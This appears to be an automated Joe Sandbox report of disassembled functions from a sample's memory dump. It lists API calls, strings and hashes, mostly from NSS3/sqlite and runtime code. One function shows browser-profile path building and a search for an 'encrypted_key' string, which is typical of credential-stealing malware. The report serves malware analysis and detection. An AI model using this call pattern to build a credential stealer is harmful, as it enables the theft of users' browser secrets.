strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C3DAD02
TlsGetValue.KERNEL32 ref: 6C3DAD3C
calloc.MOZGLUE(00000001,?), ref: 6C3DAD8C
PR_Unlock.NSS3 ref: 6C3DADC0
free.MOZGLUE(00000000), ref: 6C3DAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C3DAE58
free.MOZGLUE(00000000), ref: 6C3DAE69
free.MOZGLUE(?), ref: 6C3DAE78
PR_Unlock.NSS3 ref: 6C3DAE8C
free.MOZGLUE(?), ref: 6C3DAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C3DAEC7

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 881e60624437bf0f31af60b6cbd59c6e9cea32e04c9a5cf97b4d21738402401f
Instruction ID: 4c4ee44d7b781b1d3153c519d4041e0bc9647980144a05ea8821caea5afc1efe
Opcode Fuzzy Hash: 881e60624437bf0f31af60b6cbd59c6e9cea32e04c9a5cf97b4d21738402401f
Instruction Fuzzy Hash: E9517F72E012168BDF10EF68DD41A6F77B4AB06349F164125D819A7B10E331F915CFEA

Function 6C4B4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C4B4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C4B4CFD
sqlite3_value_text16.NSS3(?), ref: 6C4B4D44

Strings

unknown error, xrefs: 6C4B4D56
bad parameter or other API misuse, xrefs: 6C4B4D05
no more rows available, xrefs: 6C4B4D2E
another row available, xrefs: 6C4B4D20
invalid, xrefs: 6C4B4CF1
abort due to ROLLBACK, xrefs: 6C4B4D27, 6C4B4D33
API call with %s database connection pointer, xrefs: 6C4B4CF6
out of memory, xrefs: 6C4B4C78, 6C4B4C9E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 7f05b7355b648f9aff8b711f76c3af87f0cfe387a76e514669c720d1dfb673d7
Instruction ID: 24e3013ac7ccf9a0b5c8401ea00dea10fa96baaa2f7da6dae3818ee819a469ae
Opcode Fuzzy Hash: 7f05b7355b648f9aff8b711f76c3af87f0cfe387a76e514669c720d1dfb673d7
Instruction Fuzzy Hash: 69315772A0881067E709CA24A805FA5B3B5B782B9AF172125D8247BF58D734BC1787F6

Function 6C412CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C412CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C412D07

Part of subcall function 6C4F09D0: PR_Now.NSS3 ref: 6C4F0A22
Part of subcall function 6C4F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C4F0A35
Part of subcall function 6C4F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C4F0A66
Part of subcall function 6C4F09D0: PR_GetCurrentThread.NSS3 ref: 6C4F0A70
Part of subcall function 6C4F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C4F0A9D
Part of subcall function 6C4F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C4F0AC8
Part of subcall function 6C4F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C4F0AE8
Part of subcall function 6C4F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4F0B19
Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4F0B48
Part of subcall function 6C4F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4F0C76
Part of subcall function 6C4F09D0: PR_LogFlush.NSS3 ref: 6C4F0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C412D22

Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4F0B88
Part of subcall function 6C4F09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4F0C5D
Part of subcall function 6C4F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C4F0C8D
Part of subcall function 6C4F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4F0C9C
Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4F0CD1
Part of subcall function 6C4F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C4F0CEC
Part of subcall function 6C4F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4F0CFB
Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4F0D16
Part of subcall function 6C4F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C4F0D26
Part of subcall function 6C4F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4F0D35
Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C4F0D65
Part of subcall function 6C4F09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C4F0D70
Part of subcall function 6C4F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4F0D90
Part of subcall function 6C4F09D0: free.MOZGLUE(00000000), ref: 6C4F0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C412D3B

Part of subcall function 6C4F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C4F0BAB
Part of subcall function 6C4F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4F0BBA
Part of subcall function 6C4F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4F0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C412D54

Part of subcall function 6C4F09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4F0BCB
Part of subcall function 6C4F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4F0BDE
Part of subcall function 6C4F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4F0C16

Strings

slotID = 0x%x, xrefs: 6C412D02
nOl, xrefs: 6C412D6C, 6C412D9A
pLabel = 0x%p, xrefs: 6C412D4F
ulPinLen = %d, xrefs: 6C412D36
pPin = 0x%p, xrefs: 6C412D1D
C_InitToken, xrefs: 6C412CE7

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nOl
API String ID: 420000887-280439999
Opcode ID: 0f2d383f7da838fcd6ac912657d7d6b58cb209a0fd6d52f2b449c2ec9c2bcf38
Instruction ID: 9a2aa4afa8902dbd040cf477edd6db7aa3add21b0c1e3d070d1447fdd3db5322
Opcode Fuzzy Hash: 0f2d383f7da838fcd6ac912657d7d6b58cb209a0fd6d52f2b449c2ec9c2bcf38
Instruction Fuzzy Hash: B021BD75201150EFDB10FB54DD8CE693BB5EB8231EF068129E548D7E22EB309809CBA2

Function 00637E8D Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00637EB4
_free.LIBCMT ref: 00637EC2
_free.LIBCMT ref: 00637ECD
_free.LIBCMT ref: 00637EA1

Part of subcall function 0062F1BB: HeapFree.KERNEL32(00000000,00000000,?,0062EA05,00000000,0064C914,0062EA4C,?,?,?,0062EB36,0064C914,?,?,006404B8,0064C914), ref: 0062F1D1
Part of subcall function 0062F1BB: GetLastError.KERNEL32(?,?,?,0062EB36,0064C914,?,?,006404B8,0064C914,0061FF2F,?,?), ref: 0062F1E3

___free_lc_time.LIBCMT ref: 00637EEB
_free.LIBCMT ref: 00637EF6
_free.LIBCMT ref: 00637F1B
_free.LIBCMT ref: 00637F32
_free.LIBCMT ref: 00637F41

Strings

\d, xrefs: 00637EDB
Xd, xrefs: 00637F07

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: Xd$\d
API String ID: 3704779436-675015685
Opcode ID: e001fe44397e3ab9c78c95b88fbb72b7b04bb0fab19b5d22cc2b02b9070f01c0
Instruction ID: 349b50acc3da4e4d7b1ce70d7384d48074f9ecb55f4a38292dce7c03e8f47ae9
Opcode Fuzzy Hash: e001fe44397e3ab9c78c95b88fbb72b7b04bb0fab19b5d22cc2b02b9070f01c0
Instruction Fuzzy Hash: 89118FB2108702DBDB31AFB4E889A9A77A7BB00310F540C7EE50497B41CB349C508BA5

Function 00627548 Relevance: 18.2, APIs: 12, Instructions: 194stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00627580
_memset.LIBCMT ref: 00627591

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 006275BC
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 006275DA
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 006275EE
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00627601

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006239EE: GetFileAttributesA.KERNEL32(?,?,?,0061EA72,?,?,?), ref: 006239F5

Part of subcall function 006193A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 006193EE
Part of subcall function 006193A4: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0061947F

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Part of subcall function 00623E7E: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,006276A9,?), ref: 00623E89

StrStrA.SHLWAPI(00000000), ref: 006276B7
GlobalFree.KERNEL32(?), ref: 006277DB

Part of subcall function 006191FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,0061665F,00000000,?), ref: 00619239

lstrcatA.KERNEL32(?,00000000), ref: 00627767
StrCmpCA.SHLWAPI(?,006476A3), ref: 00627784
lstrcatA.KERNEL32(?,?), ref: 006277A3
lstrcatA.KERNEL32(?,00647ACC), ref: 006277B4

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Alloc$GlobalLocal_memset$AttributesCloseCreateFolderFreeHandlePathReadSizelstrcpylstrlen
String ID:
API String ID: 3596866618-0
Opcode ID: 5af1c4abebd83dd7e00f5793e1551e6d6dab35f24523aa3eb0f7e7d8ac0455f8
Instruction ID: 756befab93f35244b92e89907db81af5806fd5846e60d5d4b568b66a0a22616a
Opcode Fuzzy Hash: 5af1c4abebd83dd7e00f5793e1551e6d6dab35f24523aa3eb0f7e7d8ac0455f8
Instruction Fuzzy Hash: 7D813F71D4062D9BDF60EF64DC45BDA77BABB84310F0405E5EA08A3250EB369FA48F54

Function 6C4B2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C4B2D9F

Part of subcall function 6C36CA30: EnterCriticalSection.KERNEL32(?,?,?,6C3CF9C9,?,6C3CF4DA,6C3CF9C9,?,?,6C39369A), ref: 6C36CA7A
Part of subcall function 6C36CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C36CB26

sqlite3_exec.NSS3(?,?,6C4B2F70,?,?), ref: 6C4B2DF9
sqlite3_free.NSS3(00000000), ref: 6C4B2E2C
sqlite3_free.NSS3(?), ref: 6C4B2E3A
sqlite3_free.NSS3(?), ref: 6C4B2E52
sqlite3_mprintf.NSS3(6C51AAF9,?), ref: 6C4B2E62
sqlite3_free.NSS3(?), ref: 6C4B2E70
sqlite3_free.NSS3(?), ref: 6C4B2E89
sqlite3_free.NSS3(?), ref: 6C4B2EBB
sqlite3_free.NSS3(?), ref: 6C4B2ECB
sqlite3_free.NSS3(00000000), ref: 6C4B2F3E
sqlite3_free.NSS3(?), ref: 6C4B2F4C

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 2354fb019e576fb06a1ab2386f04fbce2dfc76874912fc0ff970317ef01fef86
Instruction ID: 7988e990027094b1d5d4fb301c8382c012cbaae062b596215be9c87803b54b4d
Opcode Fuzzy Hash: 2354fb019e576fb06a1ab2386f04fbce2dfc76874912fc0ff970317ef01fef86
Instruction Fuzzy Hash: 3C616EB5E012058BEB10CFA9D884F9EB7B5AF48349F144028EC55BBB05EB35E845CBB1

Function 6C3F7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C542120,Function_00097E60,?,?,?,?,?,6C46F9CF,6C46FAD0,00000000), ref: 6C3F7C81

Part of subcall function 6C364C70: TlsGetValue.KERNEL32(?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364C97
Part of subcall function 6C364C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CB0
Part of subcall function 6C364C70: PR_Unlock.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CC9

TlsGetValue.KERNEL32 ref: 6C3F7CA0
EnterCriticalSection.KERNEL32(?), ref: 6C3F7CB4
PR_Unlock.NSS3 ref: 6C3F7CCF

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

TlsGetValue.KERNEL32 ref: 6C3F7D04
EnterCriticalSection.KERNEL32(?), ref: 6C3F7D1B
realloc.MOZGLUE(-00000050), ref: 6C3F7D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3F7DF4
PR_Unlock.NSS3 ref: 6C3F7E0E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 14e4889012e762f7c972894b0f5db2e9fc1aa1f2d42e3f437545e21ead465a62
Instruction ID: 72ff9c2960e0e74a68be03a6a827b09a1bd4ab716bb21f5e3eeff3781ccba236
Opcode Fuzzy Hash: 14e4889012e762f7c972894b0f5db2e9fc1aa1f2d42e3f437545e21ead465a62
Instruction Fuzzy Hash: 4751F271A01110DBEB10BF28DC44E6577B5FB5331CF56992AED2487722EB32D862CEA1

Function 6C364C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CB0
PR_Unlock.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364D97
PR_Lock.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364DBA
PR_WaitCondVar.NSS3 ref: 6C364DD4
PR_Unlock.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364DEF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: bf69b0545e4fd2b7df4d589fa1db01d70e99c28d7271e8cf01ba72fce73a0d08
Instruction ID: 91961608f8952f79d2bdb127989e331cf018bfe2823f5c2d17303ef9e7b576f8
Opcode Fuzzy Hash: bf69b0545e4fd2b7df4d589fa1db01d70e99c28d7271e8cf01ba72fce73a0d08
Instruction Fuzzy Hash: 69418CB1E056158FCB10FF79D89455ABBF4BF06318F068629D8889BB05E730E894CF96

Function 0063A394 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0063A3AD

Part of subcall function 006358F2: Sleep.KERNEL32(00000000,?), ref: 0063591A

__calloc_crt.LIBCMT ref: 0063A3D1
_free.LIBCMT ref: 0063A3DF
__calloc_crt.LIBCMT ref: 0063A3ED
_free.LIBCMT ref: 0063A3FD
_free.LIBCMT ref: 0063A403
__copytlocinfo_nolock.LIBCMT ref: 0063A412
__setlocale_nolock.LIBCMT ref: 0063A41F
_free.LIBCMT ref: 0063A438
__setmbcp_nolock.LIBCMT ref: 0063A44A
_free.LIBCMT ref: 0063A458
_free.LIBCMT ref: 0063A46C

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 8f26c0892cdedb9540ff546e802911f8cce58a2100a165788ae090c05498cbed
Instruction ID: 011cab0427b29b68adfade2abacb0ceac33439529c2b5a44a41f4b1f01146bc1
Opcode Fuzzy Hash: 8f26c0892cdedb9540ff546e802911f8cce58a2100a165788ae090c05498cbed
Instruction Fuzzy Hash: B9210736104A10DBE771BF68EC0695A7BE7EF45710F20843DF8C586351DE329C11AAD9

Function 006115D6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 006115AC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 006115B6
Part of subcall function 006115AC: HeapAlloc.KERNEL32(00000000), ref: 006115BD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 006115F6
GetLastError.KERNEL32 ref: 006115FC
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00611604
GetWindowContextHelpId.USER32(00000000), ref: 0061160B
GetWindowLongW.USER32(00000000,00000000), ref: 00611613
RegisterClassW.USER32(00000000), ref: 0061161A
IsWindowVisible.USER32(00000000), ref: 00611621
ConvertDefaultLocale.KERNEL32(00000000), ref: 00611628
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00611634
IsDialogMessageW.USER32(00000000,00000000), ref: 0061163C
GetProcessHeap.KERNEL32(00000000,?), ref: 00611646
HeapFree.KERNEL32(00000000), ref: 0061164D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
